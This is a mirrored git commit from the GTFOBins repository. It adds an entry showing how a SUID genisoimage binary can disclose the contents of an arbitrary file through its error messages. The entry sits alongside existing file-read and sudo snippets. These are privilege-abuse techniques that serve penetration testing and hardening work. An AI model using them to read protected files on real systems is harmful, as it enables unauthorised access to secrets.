mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add genisoimage suid
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
c207d1f3b9
commit
9251c6a603
@ -5,6 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
genisoimage -q -o - "$LFILE"
|
genisoimage -q -o - "$LFILE"
|
||||||
|
suid:
|
||||||
|
- description: The file is parsed, and some of its content is disclosed by the error messages, thus this might not be suitable to read arbitrary data.
|
||||||
|
code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./genisoimage -sort "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
|
Loading…
Reference in New Issue
Block a user